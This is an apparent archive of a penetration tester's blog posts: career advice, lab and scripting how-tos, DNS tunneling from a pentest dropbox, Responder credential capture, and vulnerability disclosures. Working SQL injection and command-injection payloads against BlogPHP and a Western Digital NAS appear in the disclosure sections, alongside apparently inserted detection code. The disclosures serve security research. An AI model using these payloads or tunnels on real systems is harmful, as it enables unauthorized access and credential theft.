Interested or Committed

The one thing that changed my life was reading about interest vs commitment. Too often I hear people wish that things were different, or want things they will never have or accomplish, because they don’t know what it means to be committed to something. So they wander through life like a leaf on a stream, never knowing that they are holding themselves back, and perhaps blaming others or circumstance.

This is my reply to someone who asked on Reddit if they should just give up on the OSCP certification.

I’ve been trying to pass the OSCP off and on for the last 9 months. I’ve failed it 3 times, most recently failing last week after going back to the labs and successfully rooting the “hard” boxes. I keep getting closer and closer but can’t root the last box in time.
Since I started the course, I’ve learned more than I ever imagined I would, even going beyond to learn extra things, but it just doesn’t seem like enough. (Before I started I only had about 3 years real experience in IT, but no degree or anything.) I keep getting close but just can’t get over this hump. I’m juggling the challenge with a lot of personal difficulties, and it’s taken a toll on me. I don’t know if I can keep it up. There’s no question that hacking is my passion. It’s what I think about day and night. I even have dreams about coding and things. It brings me joy like nothing else. I don’t know if I can be truly satisfied in life working in any other field. I’ve wanted to be a pen tester since I was a teenager, even started working in IT with that specific goal in mind. “Giving up” isn’t in my nature, but the more I try and fail the more I question if I will have to confront that I’m not fit for this as a profession.
What should I do? I could really use some no-bullshit advice from people already working in the field.
Thanks.

https://www.reddit.com/r/AskNetsec/comments/6n7b70/what_to_do_when_you_feel_like_giving_up_am_i_just/

That tells me that you shouldn’t give up and you should keep trying.

Let me tell you about the revelation that changed my life and led to getting OSCP. Ask yourself if you’re interested or committed. If you’re interested, you’ll make excuses and give up or only do what you said you were going to do when it’s easy or convenient. When you’re committed, you don’t make nor accept any excuses. You’ll find a way to get it done and nothing can stand in your way. It’s a mindset. A few years ago when I was trying to change my life I read about “interested vs committed” and applied it to my life. I stopped sleeping in late and skipping my morning workout. I lost 35 pounds and felt great. I got the CCNA certification that I had been working on for years but never finishing because every time I got close, overtime work would get in the way of studying and I’d put it off.

I got to a point in my career when I realized that all I wanted to do was hack stuff and be a pentester after years of dabbling in it during my IT career. I enrolled in PWK. It was an emotional roller coaster. There were numerous times that I thought that maybe I just wasn’t cut out for being a pentester and I doubted myself. But each time I’d get a good night’s sleep and hit it hard the next day and eventually have a breakthrough and root a box in the lab. I was working overtime. I needed some sleep and to give my mind a break after an exhausting day at work, but I also needed more time for the labs. What did I do? I was committed, so I started waking up at 4:30 every weekday morning to work on the PWK lab before work. It didn’t take me 3 tries to pass the OSCP exam, but I did get three lab extensions before I took the test. After each lab time was up I’d take a break for a few weeks to clear my head and focus on learning things that I perceived to be weaknesses, then I’d hit the PWK lab again and get further than before.

It didn’t end there. I thought it would be easy getting a pentesting job after getting OSCP. It wasn’t. I wasn’t able to relocate and I was told that nobody wants to let a newbie pentester work remotely. Remote work was for experienced pentesters. I didn’t give up because I was committed. I took other security jobs that allowed me to do some pentesting and kept gaining experience. I found 3 zero days in web apps while I was working on sharpening my web app pentesting skills because I knew that was a weakness of mine and I knew that’s where the demand was for pentesting. I added those CVEs to my resume. I continued to wake up at 4:30 every weekday morning to study, lab, and sharpen my skills. I kept interviewing and failing because I didn’t have consulting experience or I had gaps in my knowledge. Each interview allowed me to realize where I was weak. After each interview I would study and lab more and strengthen those weaknesses. Eventually I was hired to be a pentester. Now I never feel like I’m working because I love what I do. I still wake up at 4:30 every weekday to have quiet time for studying and trying new tools, techniques, and exploits in my lab.

I may never be the smartest person or a rockstar hacker, but I’ll never stop working to improve because I love what I do and I’m committed to it. When I think about retirement, I see myself looking out over a lake view at my laptop and hacking stuff, doing bug bounties instead of bingo.

Are you interested or committed to passing OSCP? Keep on trying harder and best of luck!

Book review – Building Virtual Machine Labs: A Hands-On Guide

AKA: How to break into IT/infosec

I’ve worked in IT for over a decade, and went through that struggle to break into an IT job, and later an infosec job. Everyone that is trying to break into IT or infosec knows the struggle of not being able to get the job because you don’t have experience and can’t get experience because you don’t have the job. There’s ONE reliable way to break through, and that’s to build a home lab and learn the skills on your own time. This allows you to be able to enthusiastically and truthfully answer interview questions, or show competence on the job.

Every interview I’ve done on either side of the table has included the question “tell me about your home lab”. If you’re lacking experience but you can enthusiastically tell me how you’ve set up a virtual lab on your laptop or spare hardware, configured Active Directory, a virtual pfSense firewall, a SIEM, Apache/IIS, and hacked it and secured it, then you’ll win points during the interview.

Once you’ve broken into IT or infosec you can’t rest for long. It’s a lifelong learning process and if you don’t continue to learn and do in your personal lab then you’ll likely get left behind and become irrelevant. Yes, a home lab is a must even for seasoned professionals.

This is the book I wish I’d had many years ago when I was googling all of this info and learning it the hard way. The author does an outstanding job of explaining the underlying hardware and software needed for a virtual lab, and walking the reader through setting it all up step by step. There are multiple free hypervisor options to run your lab, and step by step instructions are included for each one.

The book starts out talking about prerequisite knowledge before moving into hardware considerations. Although you can build a lab on your laptop using free hypervisors, this section gets into hardware choices for professional labs as well as covering how to make the most of the hardware you have.

Next it moves into virtual networks, which can be confusing for newcomers trying to understand the difference between NAT, Bridged, and Host-Only adapters and when each choice makes sense to use in your lab. Virtual labs frequently run insecure software that you wouldn’t want to expose to the internet or an untrusted network, so you’ll need to understand how to use virtual switches and vNICs to segment your network.

The next section is a hypervisor guide and covers how to set up each one, including VMware Fusion/ESXi/Workstation Pro, VirtualBox, and Hyper-V. Then the book gets into step by step instructions on configuring your virtual machines, including a pfSense firewall, Kali Linux, a SIEM, an IPS, and Metasploitable2. Once you have your lab configured, you’ll need to know how to manage the hosts. This is one of the areas where the book really goes above and beyond by explaining things like persistent static routes, generating ssh keys, helpful commands, and remote access, with guides for each OS. Every infosec interview I’ve been in has asked questions about SIEMs. The book covers how to install, configure, and manage the Splunk SIEM, which is one of the more popular SIEMs in use. The book ends on a more advanced note, covering malware analysis, pentesting, and IT/Ops lab configurations.

Every time someone has asked me how to break into IT or infosec I’ve always said that you need to get busy in your home lab to build your experience, knowing that building that lab is a pretty big challenge for newcomers. Now you have an excellent book that will hold your hand step by step through the process.

I don’t often buy books because I have a Safari Books Online membership and can read an unlimited number of books online on any device, but this book was well worth the cost and I learned a few things from it even after so many years in the game.

Building Virtual Machine Labs: A Hands-On Guide

Install PowerShell on Kali Linux

I tried to install PowerShell on Kali Linux Rolling by following instructions on the GitHub page as well as other articles I found online and none of them worked. I’m going to tell you what worked for me.

In the past I’ve stuck to Bash and Python for all of my scripting needs because they work cross platform. My work-issued laptop runs Windows 10 and I use Git Bash to run my simple shell scripts that I use mainly to slice, dice, and reformat data, and Python for everything else. I’m a big fan of using one cross platform scripting language when possible.

Lately I’ve found a need to dive into PowerShell to be able to understand a complex script that I took over from a departing coworker. I was really surprised at how easy it is to work with XML using PowerShell after struggling to read XML with Python and xmlstarlet. Add in some Unicode and dependency problems while switching back and forth between Python 2.7 and 3.5 and I knew it was time to give PowerShell a chance. This had me thinking about starting a personal project to create a cross platform script in PowerShell to manage pentests and reporting.

Let’s get started installing PowerShell on Kali.

Edit: If you get an error in the next step when installing libicu55 using apt-get, download it from here instead and install using “dpkg -i”. Thanks to caoimhinp and yfnsg for feedback in the comments!

First, open a terminal and run “apt-get install libunwind8 libicu55”. Next you’ll need to download libssl1.0.0 from Debian and install with the command “dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb”. Now you can download the PowerShell Ubuntu 16.04 deb package and install using “dpkg -i powershell_6.0.0-alpha.18-1ubuntu1.16.04.1_amd64.deb”. Now you should be able to enter “powershell” in your terminal to run it.

If you get any errors when using certain PowerShell commands, curl for example, check your aliases. Some common aliases that work by default on Windows aren’t set here. You’ll need to either use the expanded cmdlet name or set a new alias.

Using Python for IP addresses

Part of the day to day tasks of any Information Security professional may include transforming system input and output text and calculating IP addresses. In this article I demonstrate how to use Python to work with IP addresses and transform system input/output.

A system that I manage at work doesn’t allow you to enter networks in CIDR notation like 192.168.0.0/24, it requires starting and ending IP addresses in a range like 192.168.0.1-192.168.0.254. In the past I’ve used ipcalc on Linux to calculate IP addresses when I have something other than a simple netmask to calculate. Today I had a list of IP subnets of various netmasks that I needed to transform into a comma separated list in the format of 192.168.0.1-192.168.0.254, 10.128.0.1-10.128.0.254…

I’m going to use the ipcalc module for Python to demonstrate how to do this. You can install it from an administrator cmd prompt or using root or sudo in a Linux terminal with the following command:

pip install ipcalc

Pretty simple to install. Now let’s move on to a demonstration of how to use it. After importing the ipcalc module, I created a new object and attempted to output the first and last host on the network, but it didn’t work quite as expected until I called the method and cast the output to a string.

Python 2.7.12 (v2.7.12:d33e0cf91556, Jun 27 2016, 15:19:22) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> import ipcalc
>>> subnet = ipcalc.Network('192.168.0.0/24')
>>> print subnet.host_first
<bound method Network.host_first of Network('192.168.0.0/24')>
>>> print str(subnet.host_first)
<bound method Network.host_first of Network('192.168.0.0/24')>
>>> print(str(subnet.host_first()))
192.168.0.1
>>> print str(subnet.host_first())
192.168.0.1
>>> print str(subnet.host_last())
192.168.0.254
>>> print str(subnet.broadcast())
192.168.0.255
>>> print str(subnet.info())
PRIVATE
>>> print str(subnet.to_ipv6())
2002:c0a8:0000:0000:0000:0000:0000:0000
>>> print str(subnet.size())
256
>>> ipaddress = ipcalc.IP('192.168.0.128/24')
>>> print str(ipaddress.subnet())
24
>>> print str(ipaddress.info())
PRIVATE
>>> print str(ipaddress.guess_network())
192.168.0.0/24
>>>

Now I’m going to take an input file with a network name followed by the network address in CIDR format on each line, cut out just the subnet, and output the networks in “firsthost-lasthost,firsthost-lasthost,…” format.

>>> with open('ips.txt') as f:
    content = f.readlines()

>>> content = [x.strip() for x in content]

>>> import sys
>>> for x in content:
    subnet = x.split(' ')[-1]
    networkobj = ipcalc.Network(subnet)
    sys.stdout.write("%s-%s," % (str(networkobj.host_first()),str(networkobj.host_last())))

In the code above, I loop through each line of the file and get the last word in the string, which is the subnet address. It was necessary to use sys.stdout.write() to get rid of the space that Python 2.7’s print statement puts between each network’s start and end addresses. I’m not going to show you the output. If you want to know my public IP addresses then you’ll have to work to find them yourself. 🙂

I’m sure that there is more than one way to write the code for this exercise. If you have any constructive feedback please leave a comment. Thanks for visiting!
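One other way to write it, added here as an example rather than the post’s own code: the standard library’s ipaddress module (Python 3) does the same first-host/last-host calculation without the third-party ipcalc package, and it also handles the small-prefix edge cases that a naive “network + 1, broadcast - 1” rule gets wrong (a /31 has two usable hosts, a /32 is a single host). The input lines below are constructed to match the “name subnet” layout the post describes; the names and subnets are made up.

```python
import ipaddress
import sys

# Constructed sample input in the shape the post describes: a network name
# followed by the network address in CIDR notation on each line.
SAMPLE_LINES = """\
corp-lan 192.168.0.0/24
dmz 10.128.0.0/24
vpn-link 172.16.5.0/30
mgmt-p2p 10.9.9.0/31
loopback 10.255.255.1/32
"""


def host_range(cidr):
    """Return (first_host, last_host) for a CIDR block as dotted strings.

    Matches ipcalc's host_first()/host_last() for ordinary subnets and
    handles the edge cases: a /31 has two usable hosts (RFC 3021) and a
    /32 is one host, so neither has a separate network/broadcast address.
    """
    # strict=False accepts an address with host bits set (e.g. 192.168.0.128/24),
    # the way ipcalc.IP().guess_network() does above.
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen >= net.max_prefixlen - 1:
        return str(net.network_address), str(net.broadcast_address)
    return str(net.network_address + 1), str(net.broadcast_address - 1)


def ranges_from_lines(lines):
    """Turn 'name cidr' lines into the comma-separated first-last list."""
    ranges = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):   # skip blanks and comments
            continue
        cidr = line.split()[-1]                # last word on the line is the subnet
        first, last = host_range(cidr)
        ranges.append("%s-%s" % (first, last))
    return ",".join(ranges)


if __name__ == "__main__":
    # Usage: python cidr_ranges.py ips.txt   (falls back to the sample above)
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LINES.splitlines()
    print(ranges_from_lines(source))
```

Joining with "," also drops the trailing comma that the sys.stdout.write() loop leaves at the end of the output.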

Configure pentest dropbox DNS tunneling

I work for a very large corporation that has many subsidiaries and is buying up smaller companies. We need to send out a dropbox (Raspberry Pi or Intel NUC) that a remote office can plug into the network for internal pentesting, and it establishes an ssh tunnel to our server regardless of network restrictions in the remote office.

Initially we used TAP from TrustedSec. TAP first tries to connect to a URL to retrieve a ‘commands.txt’ file that contains commands to run. If you don’t configure that, or if it fails to connect to your http/https/ftp server URL, TAP will fail over to ssh and establish an ssh tunnel. We sometimes experienced issues with the dropbox connecting out from networks that required a proxy server and denied ssh outbound.

My solution was to configure the dropbox to tunnel over DNS if the device is unable to establish a connection over TAP.

I’ll leave configuring TAP up to the reader as another pentester installed it and I installed iodine. The TAP github page setup instructions seem easy enough to understand.

Steps to reproduce DNS tunneling using iodine:

Configure DNS:
See the iodine setup guide: http://dev.kryo.se/iodine/wiki/HowtoSetup.
I thought I had missed something when it didn’t work the same day. After waiting for DNS changes to propagate I tried again the following day and it worked. The setup guide has a link to a tunnel tester in the Troubleshooting section.

Download iodine and install. Same steps on client and server:

git clone https://github.com/yarrick/iodine
cd iodine
make
sudo make install

Add iptables rules on your server to allow DNS connections.

sudo iptables -I INPUT 1 -p tcp --dport 53 -j ACCEPT
sudo iptables -I INPUT 2 -p udp --dport 53 -j ACCEPT

Run iodined on the server:

sudo ./iodined -f -c <tunnel IP address> <domain.name.com>

After entering your password for sudo, you’ll be prompted for a password for the tunnel connection. You can add the ‘-P <password>’ option on both client and server to script/automate the connection and avoid being prompted to enter one.
The ‘-f’ option was used to make it run in the foreground for troubleshooting and isn’t necessary once you have it working.
Note that the ‘-c’ option was critical to getting this to work.
The tunnel IP address is the local tunnel IP of your server. It isn’t the actual server IP address, it should be something that isn’t likely to be used on the LAN at either end. I used 10.0.0.1, and the dropbox client automatically received a tunnel IP address of 10.0.0.2. (netmask 255.255.255.224)

Run iodine on the client:

sudo iodine -f -r -P <password> <domain.name.com>

After sshing into the dropbox from my server over the DNS tunnel I was surprised to see that there wasn’t much lag and the connection was usable. I expected the connection to be much slower.

Configure the dropbox to check for a ssh connection over TAP after startup, and if none then start iodine to tunnel over DNS.

Edit: After posting a link to my article on Reddit and seeing some of the responses I realized that some don’t understand how DNS tunneling works and assume that if they block port 53 outbound and only allow network clients to use their internal DNS server then they are blocking DNS tunneling.

Here’s a good read to understand how DNS tunneling works and how to detect it. (I recommend Bro for DNS traffic analysis.) https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152

Two relevant sections of the paper that are critical to understanding how DNS tunneling works:

With this hierarchical system a given domain owner can define the authoritative servers for their domain. This means that they are in control of the ultimate destination host for DNS queries for their domain. In a typical enterprise, endpoints do not make DNS requests directly to the internet. They have internal DNS servers that provide DNS services to an endpoint. However, given that DNS will forward their requests until the authoritative name server is contacted, an attacker with access on an internal endpoint can leverage the enterprise’s DNS infrastructure for DNS tunneling to a domain that they control.

The last core technique is to encode data in DNS payloads. This is an area where the specifics of each utility vary widely. From a high level simplified point of view, the client wants to send data to the server. It will encode that data in the DNS payload. For example the client could send an ‘A’ record request where the data is encoded in the host name: MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.example.com. The server could respond with an answer as a CNAME response: NVWW2IDPOZQWY5DJNZSQ.t.example.com. In this way any data can be encoded and sent to the server. The server can also respond with any data. If there is a need for the server to initiate a communication, it cannot be done directly. Clients do not have a service listening for DNS requests and are typically behind a firewall. Server initiated communication can however be accomplished by having the client regularly poll the server. Then, if the server has data for the client it can send it as a response to the polling requests.
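The two properties the paper describes, long encoded labels and a client that keeps polling with ever-changing names, are exactly what a DNS log analysis looks for. As an added example (not from the post or the SANS paper), the Python below scores query names the way you might over the “query” column of a Bro/Zeek dns.log: a single query is suspicious when its leftmost label is long and high-entropy, and a domain is a tunnel candidate when several distinct suspicious names are seen under it. The sample queries are constructed; the two encoded names are the ones quoted from the paper above, the other t.example.com names imitate the polling pattern, and the rest are ordinary lookups. Grouping by the last two labels stands in for a proper Public Suffix List lookup, which is what a real deployment should use.

```python
import math
from collections import defaultdict

# Constructed sample in the shape of the "query" column of a Bro/Zeek dns.log.
SAMPLE_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "cdn.example.com",
    "MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.example.com",  # quoted from the paper
    "NVWW2IDPOZQWY5DJNZSQ.t.example.com",             # quoted from the paper
    "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ.t.example.com",  # constructed poll
    "KRSXG5BAMRQXIYJAON2HE2LOM4.t.example.com",        # constructed poll
    "ONSWG4TFOQQG6ZTGNFRWK.t.example.com",             # constructed poll
    "www.example.org",
    "a-very-long-but-readable-hostname.example.org",   # long but legitimate, one-off
    "api.example.org",
]


def shannon_entropy(text):
    """Bits per character; encoded payloads score high, words score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = float(len(text))
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name):
    """Last two labels, e.g. 't.example.com' -> 'example.com'.
    Assumption: a real detector would consult the Public Suffix List here."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_suspicious_query(name, min_label_len=20, min_entropy=3.0):
    """One query looks like carried data if its leftmost label is long and
    high-entropy; ordinary hostnames are short or low-entropy."""
    label = name.split(".")[0]
    return len(label) >= min_label_len and shannon_entropy(label) >= min_entropy


def tunnel_candidates(queries, min_suspicious=3):
    """Group suspicious queries by registered domain and keep the domains that
    have enough *distinct* suspicious names to look like a polling tunnel
    rather than a single odd hostname. Returns {domain: distinct_count}."""
    per_domain = defaultdict(set)
    for q in queries:
        if is_suspicious_query(q):
            per_domain[registered_domain(q)].add(q.lower())
    return {d: len(names) for d, names in per_domain.items()
            if len(names) >= min_suspicious}


if __name__ == "__main__":
    for domain, count in sorted(tunnel_candidates(SAMPLE_QUERIES).items()):
        print("possible DNS tunnel: %s (%d distinct high-entropy names)" % (domain, count))
```

Note that the readable-but-long example.org name trips the per-query check on its own, which is why the decision is made per domain over a count of distinct names; in a live log you would also look at query volume and the share of TXT/NULL/CNAME record types, which the paper covers.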

Responder – spoofing LLMNR and NBT-NS to capture password hashes

“Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.” Download from https://github.com/SpiderLabs/Responder

One cool thing I didn’t cover in the video is how to force a basic authentication login prompt to capture plain text credentials by using the command line so that we don’t have to crack anything. This would be useful to try after an initial run with Responder doesn’t provide any password hashes that we are able to crack.

responder -I eth0 -r -w -b -F --lm -v

Of course the victim will see a prompt for login and password, and we’re hoping that they will authenticate.

Check out my video below to see how to install Responder, and how to capture and crack the password hashes.

My first CVE-2016-1000329 in BlogPHP

While the affected software, BlogPHP isn’t in widespread use (at least I hope not!) and it’s outdated and abandoned by the developer, this find means a lot to me because it’s my first CVE. This vulnerability has also been overlooked by many people for years, including those that worked on the Breach 2.1 vulnhub challenge. Breach 2.1 is a boot2root/CTF challenge which attempts to showcase a real-world scenario penetration test. My full write-up of my pentest of Breach can be found here.

I used an XSS exploit to steal the admin’s cookie, which should have allowed me to log in as admin, but it didn’t work. Knowing that the admin user was logging in to a blog hosted on the same host, I decided to take a look at the HTTP headers to see if I needed to change something in the “Referer” field in order for the stolen cookie to allow me to log in as admin. I initially tried changing it to localhost and 127.0.0.1 with no success.

While fuzzing the HTTP header “Referer” field I discovered a blind SQL injection. Using an input of ‘+(select*from(select(sleep(20)))a)+’, including the single quotes, results in a 20 second delay before the page renders. I was able to further exploit the vulnerability using sqlmap. I saved the request from Burp Suite to a text file and exploited it with sqlmap using “sqlmap -r req.txt --level=5 --risk=3”.

I submitted my CVE request through Mitre, who notified me that “The Distributed Weakness Filing (DWF) Project is the CVE Numbering Authority (CNA) currently responsible for assigning CVE IDs to open source software vulnerabilities that are outside of the current CVE coverage goals listed at http://cve.mitre.org/cve/data_sources_product_coverage.html.”

CVE listing for CVE-2016-1000329 on DWF.

Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the Cookie header sent to the home page URL, “/” (index.php). To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close
cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.
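Both requests share one pattern: a value the device trusts (the username cookie, the arg body parameter) carries shell metacharacters straight into a command. The Python below is an added example, not Western Digital’s code or the post’s, of the two sides of that pattern: a detector that pulls cookie and body parameters out of a raw request, URL-decodes them the way the firmware would, and flags anything containing |, ;, &, backticks, $( or a newline; and the allowlist check a hardened handler should apply to a username before the value goes anywhere near a shell. The three requests are constructed from the two captures above plus a benign baseline; the field names and the allowlist pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Shell metacharacters that chain a second command onto a value passed to a shell:
# pipe, command separators, backticks, $(...) and newlines.
SHELL_META = re.compile(r"[|;&`\n]|\$\(")

# Assumed allowlist for a username field; what a hardened handler should accept.
VALID_USERNAME = re.compile(r"^[A-Za-z0-9._-]{1,32}$")

# Constructed requests in the shape of the two captures on this page, plus a benign one.
REQ_INDEX = (
    "GET / HTTP/1.1\r\n"
    "Host: wdmycloudex2\r\n"
    "Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1\r\n"
    "\r\n"
)
REQ_ANALYTICS = (
    "POST /web/google_analytics.php HTTP/1.1\r\n"
    "Host: wdmycloudex2\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "Cookie: isAdmin=1; username=admin; local_login=1; fw_version=2.11.142\r\n"
    "\r\n"
    "cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23"
)
REQ_BENIGN = (
    "GET / HTTP/1.1\r\n"
    "Host: wdmycloudex2\r\n"
    "Cookie: isAdmin=1; username=admin; local_login=1\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def cookie_fields(cookie_header):
    """Parse 'a=1; b=2' into a dict, URL-decoding values as the firmware would."""
    fields = {}
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            fields[name] = unquote(value)
    return fields


def flagged_fields(raw):
    """Return [(location, name, decoded value)] for every cookie or body
    parameter whose decoded value contains shell metacharacters."""
    _, _, headers, body = parse_request(raw)
    hits = []
    for name, value in cookie_fields(headers.get("cookie", "")).items():
        if SHELL_META.search(value):
            hits.append(("cookie", name, value))
    for name, values in parse_qs(body).items():
        for value in values:
            if SHELL_META.search(value):
                hits.append(("body", name, value))
    return hits


def is_valid_username(value):
    """Allowlist check: reject anything outside a tight charset. The real fix is
    to also stop building shell commands from request data at all."""
    return VALID_USERNAME.match(value) is not None


if __name__ == "__main__":
    for label, req in (("index", REQ_INDEX), ("analytics", REQ_ANALYTICS), ("benign", REQ_BENIGN)):
        print(label, flagged_fields(req))
```

Run over a proxy or web server log that records cookies and POST bodies, the same function gives you a cheap first-pass detection for this class of bug on any appliance, not just this one; the allowlist is the input-side fix, and it is no substitute for calling the underlying command with an argument list rather than through a shell.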

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVEs CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017:

Passive Information Gathering

I prepared this presentation for the 757 White Hat Hackers meeting on 10/26, where I presented on Passive Information Gathering. Passive Information Gathering is simply reconnaissance methods that don’t touch the target or leave any traces of your presence.

Topics:

  • Whois
  • Dig
  • Recon-ng
  • Theharvester
  • Network-tools.com
  • Netcraft Toolbar
  • SiteDigger
  • Shodan
  • Maltego

Whois

The whois client is installed by default on most Linux systems and returns the following domain information:

Registrar: The company/organization that registered the domain on behalf of the domain’s owner.
Name Servers: The servers that control the domain’s DNS.
Creation Date: The date the domain was originally registered.
Expiration Date: When the domain will expire.
Contacts: Publicly accessible contact information, required by registrars.

Usage: “whois <domainName>”

root@DESKTOP-7ETQJM7:~# whois nasa.gov
% DOTGOV WHOIS Server ready
 Domain Name: NASA.GOV
 Status: ACTIVE

>>> Last update of whois database: 2016-10-28T17:55:42Z <<<
Please be advised that this whois server only contains information pertaining
to the .GOV domain. For information for other domains please use the whois
server at RS.INTERNIC.NET.
root@DESKTOP-7ETQJM7:~# whois yahoo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

 Server Name: YAHOO.COM.ACCUTAXSERVICES.COM
 IP Address: 98.136.43.32
 IP Address: 66.196.84.168
 Registrar: WILD WEST DOMAINS, LLC
 Whois Server: whois.wildwestdomains.com
 Referral URL: http://www.wildwestdomains.com


 Server Name: YAHOO.COM.ANGRYPIRATES.COM
 IP Address: 8.8.8.8
 Registrar: NAME.COM, INC.
 Whois Server: whois.name.com
 Referral URL: http://www.name.com


 Server Name: YAHOO.COM.AU
 Registrar: WILD WEST DOMAINS, LLC
 Whois Server: whois.wildwestdomains.com
 Referral URL: http://www.wildwestdomains.com


 Server Name: YAHOO.COM.BGPETERSON.COM
 IP Address: 66.218.71.205
 Registrar: TUCOWS DOMAINS INC.
 Whois Server: whois.tucows.com
 Referral URL: http://www.tucowsdomains.com


 Server Name: YAHOO.COM.BIGROCK.IN
 Registrar: BIGROCK SOLUTIONS LIMITED
 Whois Server: Whois.bigrock.com
 Referral URL: http://www.bigrock.com


 Server Name: YAHOO.COM.BR
 Registrar: ENOM, INC.
 Whois Server: whois.enom.com
 Referral URL: http://www.enom.com


 Server Name: YAHOO.COM.CN
 Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
 Whois Server: whois.dns.com.cn
 Referral URL: http://www.dns.com.cn


 Server Name: YAHOO.COM.DALLARIVA.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.ELPOV.COM
 IP Address: 66.21.71.205
 Registrar: TIERRANET INC. D/B/A DOMAINDISCOVER
 Whois Server: whois.domaindiscover.com
 Referral URL: http://www.domaindiscover.com


 Server Name: YAHOO.COM.HACKED.BY.JAPTRON.ES
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.HK
 Registrar: ENOM, INC.
 Whois Server: whois.enom.com
 Referral URL: http://www.enom.com


 Server Name: YAHOO.COM.IS.N0T.AS.1337.AS.SEARCH.GULLI.COM
 IP Address: 80.190.192.24
 Registrar: COREHUB, S.R.L.
 Whois Server: whois.corehub.net
 Referral URL: http://corehub.net


 Server Name: YAHOO.COM.JTNELECTRIC.COM
 IP Address: 66.218.71.205
 IP Address: 216.109.116.20
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
 IP Address: 203.36.226.2
 Registrar: INSTRA CORPORATION PTY, LTD.
 Whois Server: whois.instra.net
 Referral URL: http://www.instra.com


 Server Name: YAHOO.COM.MX
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Server Name: YAHOO.COM.MY
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Server Name: YAHOO.COM.SG
 Registrar: DOTSTER, INC.
 Whois Server: whois.dotster.com
 Referral URL: http://www.dotster.com


 Server Name: YAHOO.COM.TW
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.TWIXTEARS.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.VIRGINCHASSIS.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.VN
 Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE
 Whois Server: whois.melbourneit.com
 Referral URL: http://www.melbourneit.com.au


